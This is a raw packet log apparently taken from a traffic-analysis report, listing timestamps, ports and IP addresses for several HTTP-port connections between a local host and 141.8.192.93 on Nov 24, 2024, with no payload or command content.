Nov 24, 2024 04:02:37.974179029 CET	80	49759	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:37.974191904 CET	80	49759	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:37.974204063 CET	80	49759	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:37.974219084 CET	80	49759	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:37.974237919 CET	49759	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:02:37.974272013 CET	49759	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:02:37.974289894 CET	80	49759	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:37.974302053 CET	80	49759	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:37.974312067 CET	80	49759	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:37.974349976 CET	49759	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:02:37.974349976 CET	49759	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:02:38.093732119 CET	80	49759	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:38.093862057 CET	80	49759	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:38.093919992 CET	49759	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:02:38.097855091 CET	80	49759	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:38.141213894 CET	49759	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:02:38.175276041 CET	80	49759	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:38.175337076 CET	80	49759	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:38.175405025 CET	49759	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:02:38.179435015 CET	80	49759	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:38.179539919 CET	80	49759	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:38.179593086 CET	49759	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:02:38.187768936 CET	80	49759	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:38.190813065 CET	80	49759	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:38.190872908 CET	49759	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:02:38.190901995 CET	80	49759	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:38.199254990 CET	80	49759	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:38.199357033 CET	49759	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:02:38.199361086 CET	80	49759	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:38.207623959 CET	80	49759	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:38.207712889 CET	49759	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:02:38.207746983 CET	80	49759	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:38.215979099 CET	80	49759	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:38.216042995 CET	49759	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:02:38.216085911 CET	80	49759	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:38.224349022 CET	80	49759	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:38.224396944 CET	49759	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:02:38.224500895 CET	80	49759	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:38.232781887 CET	80	49759	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:38.232853889 CET	80	49759	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:38.232863903 CET	49759	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:02:38.241111040 CET	80	49759	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:38.241172075 CET	49759	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:02:38.241215944 CET	80	49759	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:38.249490976 CET	80	49759	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:38.249550104 CET	49759	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:02:38.249594927 CET	80	49759	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:38.260749102 CET	80	49759	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:38.260816097 CET	49759	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:02:38.260822058 CET	80	49759	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:38.294864893 CET	80	49759	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:38.294955969 CET	49759	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:02:38.376478910 CET	80	49759	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:38.376648903 CET	80	49759	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:38.376760960 CET	49759	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:02:38.379120111 CET	80	49759	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:38.379216909 CET	80	49759	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:38.379357100 CET	49759	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:02:38.384270906 CET	80	49759	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:38.384390116 CET	80	49759	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:38.384529114 CET	49759	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:02:38.389230013 CET	80	49759	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:38.389348984 CET	80	49759	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:38.389447927 CET	49759	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:02:38.394433975 CET	80	49759	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:38.394578934 CET	80	49759	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:38.394638062 CET	49759	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:02:38.399615049 CET	80	49759	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:38.399661064 CET	80	49759	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:38.399916887 CET	49759	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:02:38.401078939 CET	49759	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:02:38.520558119 CET	80	49759	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:38.838293076 CET	80	49759	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:38.838305950 CET	80	49759	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:38.838392019 CET	49759	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:02:38.839299917 CET	80	49759	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:38.839420080 CET	80	49759	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:38.839490891 CET	49759	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:02:38.843143940 CET	80	49759	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:38.843261003 CET	80	49759	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:38.843338966 CET	49759	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:02:38.846961021 CET	80	49759	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:38.847053051 CET	80	49759	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:38.847371101 CET	49759	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:02:38.850733995 CET	80	49759	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:38.850868940 CET	80	49759	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:38.850987911 CET	49759	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:02:38.854535103 CET	80	49759	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:38.854630947 CET	80	49759	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:38.854783058 CET	49759	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:02:38.858338118 CET	80	49759	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:38.858408928 CET	80	49759	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:38.858549118 CET	49759	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:02:38.862168074 CET	80	49759	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:38.862282991 CET	80	49759	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:38.862407923 CET	49759	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:02:38.865962029 CET	80	49759	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:38.866076946 CET	80	49759	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:38.866190910 CET	49759	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:02:38.869781971 CET	80	49759	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:38.869884968 CET	80	49759	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:38.869992018 CET	49759	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:02:38.873586893 CET	80	49759	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:38.873604059 CET	80	49759	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:38.873667955 CET	49759	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:02:38.877370119 CET	80	49759	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:38.877487898 CET	80	49759	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:38.877912045 CET	49759	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:02:38.881187916 CET	80	49759	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:38.922471046 CET	49759	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:02:38.953036070 CET	80	49759	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:38.953270912 CET	80	49759	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:38.953341961 CET	49759	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:02:38.954049110 CET	80	49759	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:38.954164028 CET	80	49759	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:38.954226017 CET	49759	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:02:38.957869053 CET	80	49759	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:38.957966089 CET	80	49759	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:38.958020926 CET	49759	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:02:38.961661100 CET	80	49759	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:38.961777925 CET	80	49759	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:38.962024927 CET	49759	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:02:38.965461969 CET	80	49759	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:38.965559959 CET	80	49759	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:38.965743065 CET	49759	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:02:38.969269991 CET	80	49759	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:38.969377041 CET	80	49759	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:38.969532013 CET	49759	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:02:38.973073006 CET	80	49759	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:38.973169088 CET	80	49759	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:38.973213911 CET	49759	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:02:38.976886034 CET	80	49759	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:38.976913929 CET	80	49759	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:38.976969004 CET	49759	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:02:38.980730057 CET	80	49759	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:38.980844021 CET	80	49759	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:38.980925083 CET	49759	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:02:38.985538006 CET	80	49759	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:38.985548973 CET	80	49759	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:38.985620975 CET	49759	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:02:38.989056110 CET	80	49759	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:38.989067078 CET	80	49759	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:38.989103079 CET	49759	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:02:38.992708921 CET	80	49759	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:38.992885113 CET	80	49759	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:38.992930889 CET	49759	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:02:38.995640993 CET	49759	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:02:47.754745007 CET	49786	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:02:47.874358892 CET	80	49786	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:47.874449015 CET	49786	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:02:47.874802113 CET	49786	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:02:47.994283915 CET	80	49786	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:49.280682087 CET	80	49786	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:49.280725956 CET	80	49786	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:49.280735970 CET	80	49786	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:49.280812025 CET	49786	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:02:49.280833006 CET	80	49786	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:49.280847073 CET	80	49786	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:49.280865908 CET	80	49786	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:49.280879974 CET	80	49786	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:49.280894995 CET	80	49786	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:49.280906916 CET	80	49786	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:49.280919075 CET	80	49786	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:49.280919075 CET	49786	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:02:49.280973911 CET	49786	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:02:49.280973911 CET	49786	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:02:49.519912958 CET	80	49786	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:49.519975901 CET	80	49786	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:49.520011902 CET	80	49786	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:49.520212889 CET	49786	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:02:49.639256001 CET	80	49786	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:49.639302969 CET	80	49786	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:49.639374018 CET	49786	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:02:49.639383078 CET	80	49786	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:49.639420986 CET	80	49786	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:49.639475107 CET	80	49786	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:49.639511108 CET	80	49786	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:49.639544964 CET	80	49786	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:49.639550924 CET	49786	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:02:49.639579058 CET	49786	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:02:49.639580965 CET	80	49786	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:49.639616013 CET	80	49786	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:49.639650106 CET	80	49786	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:49.639697075 CET	80	49786	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:49.639730930 CET	80	49786	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:49.639733076 CET	49786	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:02:49.639733076 CET	49786	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:02:49.639785051 CET	49786	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:02:49.639844894 CET	80	49786	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:49.639878035 CET	80	49786	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:49.639931917 CET	80	49786	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:49.639966965 CET	80	49786	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:49.640022993 CET	49786	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:02:49.640105963 CET	80	49786	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:49.640134096 CET	49786	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:02:49.640141010 CET	80	49786	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:49.640234947 CET	49786	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:02:49.643997908 CET	80	49786	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:49.644160986 CET	80	49786	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:49.644272089 CET	49786	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:02:49.652405977 CET	80	49786	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:49.652478933 CET	80	49786	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:49.653392076 CET	49786	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:02:49.683542967 CET	80	49786	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:49.735162020 CET	49786	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:02:49.759875059 CET	80	49786	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:49.760000944 CET	80	49786	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:49.760267973 CET	49786	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:02:49.763921976 CET	80	49786	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:49.763994932 CET	80	49786	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:49.764137983 CET	49786	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:02:49.772306919 CET	80	49786	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:49.772344112 CET	80	49786	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:49.772456884 CET	49786	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:02:49.780648947 CET	80	49786	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:49.780771017 CET	80	49786	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:49.781060934 CET	49786	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:02:49.789041042 CET	80	49786	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:49.789170980 CET	80	49786	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:49.790330887 CET	49786	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:02:49.797410965 CET	80	49786	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:49.797538996 CET	80	49786	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:49.797950983 CET	49786	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:02:49.805223942 CET	80	49786	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:49.807251930 CET	49786	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:02:49.926826000 CET	80	49786	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:50.245115042 CET	80	49786	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:50.245172977 CET	80	49786	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:50.245387077 CET	49786	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:02:50.247303963 CET	80	49786	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:50.247405052 CET	80	49786	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:50.248191118 CET	49786	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:02:50.255033970 CET	80	49786	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:50.255148888 CET	80	49786	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:50.255204916 CET	49786	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:02:50.262731075 CET	80	49786	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:50.262842894 CET	80	49786	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:50.262952089 CET	49786	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:02:50.270440102 CET	80	49786	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:50.270576000 CET	80	49786	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:50.270658016 CET	49786	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:02:50.278096914 CET	80	49786	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:50.278191090 CET	80	49786	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:50.278297901 CET	49786	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:02:50.285823107 CET	80	49786	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:50.332174063 CET	49786	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:02:50.360070944 CET	80	49786	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:50.360110998 CET	80	49786	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:50.360199928 CET	49786	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:02:50.363811970 CET	80	49786	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:50.363903999 CET	80	49786	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:50.363970041 CET	49786	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:02:50.371440887 CET	80	49786	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:50.371551991 CET	80	49786	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:50.371623039 CET	49786	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:02:50.379157066 CET	80	49786	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:50.379291058 CET	80	49786	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:50.379360914 CET	49786	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:02:50.386869907 CET	80	49786	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:50.386975050 CET	80	49786	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:50.387049913 CET	49786	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:02:50.394552946 CET	80	49786	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:50.394654989 CET	80	49786	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:50.394717932 CET	49786	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:02:50.402302027 CET	80	49786	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:50.402403116 CET	80	49786	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:50.402461052 CET	49786	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:02:50.409984112 CET	80	49786	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:50.410083055 CET	80	49786	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:50.410154104 CET	49786	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:02:50.417644978 CET	80	49786	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:50.417753935 CET	80	49786	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:50.417825937 CET	49786	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:02:50.425354004 CET	80	49786	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:50.425409079 CET	80	49786	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:50.425473928 CET	49786	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:02:50.433037043 CET	80	49786	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:50.433170080 CET	80	49786	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:50.433257103 CET	49786	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:02:50.440740108 CET	80	49786	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:50.440840006 CET	80	49786	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:50.440908909 CET	49786	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:02:50.474394083 CET	80	49786	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:50.474519014 CET	80	49786	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:50.474584103 CET	49786	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:02:50.478140116 CET	80	49786	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:50.479564905 CET	80	49786	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:50.479645967 CET	49786	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:02:50.479646921 CET	80	49786	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:50.487277031 CET	80	49786	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:50.487386942 CET	80	49786	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:50.487452984 CET	49786	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:02:50.494971037 CET	80	49786	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:50.495069027 CET	80	49786	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:50.495143890 CET	49786	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:02:50.502659082 CET	80	49786	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:50.502768040 CET	80	49786	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:50.502865076 CET	49786	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:02:50.510358095 CET	80	49786	141.8.192.93	192.168.2.5
Nov 24, 2024 04:02:50.514017105 CET	49786	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:02:50.565926075 CET	49786	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:03:08.825047970 CET	49836	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:03:08.944551945 CET	80	49836	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:08.944642067 CET	49836	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:03:08.944873095 CET	49836	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:03:09.064363956 CET	80	49836	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:10.389750004 CET	80	49836	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:10.389817953 CET	80	49836	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:10.389890909 CET	80	49836	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:10.389897108 CET	49836	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:03:10.389977932 CET	80	49836	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:10.390006065 CET	80	49836	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:10.390018940 CET	49836	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:03:10.390088081 CET	80	49836	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:10.390100956 CET	80	49836	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:10.390114069 CET	80	49836	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:10.390125990 CET	80	49836	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:10.390139103 CET	80	49836	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:10.390225887 CET	49836	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:03:10.390278101 CET	49836	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:03:10.509502888 CET	80	49836	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:10.509524107 CET	80	49836	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:10.509676933 CET	49836	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:03:10.513616085 CET	80	49836	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:10.563153982 CET	49836	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:03:10.600564957 CET	80	49836	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:10.600606918 CET	80	49836	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:10.600672960 CET	49836	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:03:10.605149984 CET	80	49836	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:10.605168104 CET	80	49836	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:10.605249882 CET	49836	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:03:10.613136053 CET	80	49836	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:10.613254070 CET	80	49836	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:10.613317966 CET	49836	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:03:10.621505022 CET	80	49836	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:10.621582985 CET	80	49836	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:10.621642113 CET	49836	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:03:10.629894018 CET	80	49836	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:10.630032063 CET	80	49836	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:10.630112886 CET	49836	80	192.168.2.5	141.8.192.93
